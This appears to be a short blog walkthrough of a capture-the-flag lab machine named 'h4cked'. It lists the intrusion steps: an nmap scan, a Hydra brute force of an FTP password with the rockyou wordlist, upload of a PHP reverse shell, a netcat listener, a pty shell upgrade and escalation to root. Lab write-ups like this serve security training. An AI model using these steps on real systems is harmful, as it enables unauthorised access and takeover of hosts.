h4cked Task 2


Use nmap to scan for open ports: sudo nmap -Pn

Use Hydra to bruteforce the FTP login: hydra -l jenny -P /usr/share/wordlists/rockyou.txt -t 4

Login to the ftp server with user and password

Get both files to your local machine

Edit the reverse shell php scrip with your own ip

Upload the new reverse shell script via put and change its permission: chmod 777

Start a netcat listner with the choosen port

Head to the web browser and excute the php scrip: http://machine-ip/scripname.php

Use the python script to gain a shell: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

change user to jenny : su jenny

sudo su to become root

cd to the Reptile folder to get the flag

Create a website or blog at WordPress.com